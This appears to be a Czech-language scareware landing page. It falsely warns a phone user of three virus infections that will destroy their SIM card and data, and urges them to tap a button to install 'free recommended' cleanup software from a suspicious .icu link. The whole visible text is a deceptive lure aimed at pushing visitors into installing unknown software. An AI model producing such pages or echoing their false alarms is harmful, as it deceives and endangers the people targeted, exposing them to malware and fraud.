
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <!--<base href="">--><base href=".">

    
    
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <title>Virus!</title>
    <style>
         #timer p,
        p {
            color: #555;
        }

        #error,
        #timer {
            display: inline-block;
            float: left;
        }

            #timer p,
            .btn {
                font-weight: 700;
            }

        body {
            font-family: sans-serif;
        }

        a {
            text-decoration: none;
        }

        footer,
        header,
        section {
            clear: both;
        }

        * {
            margin: 0;
            padding: 0;
        }

        #wrapper {
            margin: 0 auto;
            max-width: 400px;
            border: 0px solid #303030;
            border-radius: 0px;
        }

        h1 {
            font-size: 20px;
        }

        p {
            font-size: 14px;
            padding: 5px 0;
        }

        #timer {
            max-width: 290px;
            width: 65%;
        }

            #timer p {
                font-size: 12px;
            }

        #error {
            max-width: 120px;
            width: 35%;
        }

            #error img {
                width: 100%;
            }

        .btn {
            background-color: #6d96f1;
            border-radius: 5px;
            color: #fff;
            display: block;
            line-height: 50px;
            max-width: 275px;
            width: 90%;
        }

        .red {
            color: red;
        }

        .container {
            padding-left: 8px;
            padding-right: 8px;
        }
    
    </style>
<script>


</script></head>
        
<body onclick="goto()">
    <div id="wrapper">
        <div class="container">
            
            <section>
                <h1>Je možné, že jste nakaženi (3) víry!</h1>
            </section>
            <section>
                <div >
                   
                    <p> </p><span style="font-size: 20px; font-weight: bold; color: red; font-family: sans-serif;" >Brzy to může poškodit vaši sim-kartu, a vaše telefonní kontakty, obrázky, data, aplikace aj. zmizí.</span>.
                    <br>
                    <p> </p>
                </div>
                <div id="error">
                    <img src="./index_files/bot.png">
                </div>
            </section>
            <section>
                <p>
                    <b>Jak opravit telefon:</b>
                    <br>
                    <br><strong>Krok 1: Abyste instalovali software pro smazání viru, zmáčkněte tlačítko dole pro instalaci software doporuceneho zdarma</strong>
                    <br>
                    <br><strong>Krok 2: Pro vymazání všech virů spusťte aplikaci</strong>
                </p>
                <p></p>
            </section>
            <footer>
                <p align="center">
                    <a class="btn" href="https://pields-ladayeast.icu/click" >Dál</a>
                </p>
            </footer>
        </div>
       
        
    </div>
<script>

function goto(){
  PreventExitPop = false;
    location.href = "https://www.google.com/";
}

</script>
</body></html>
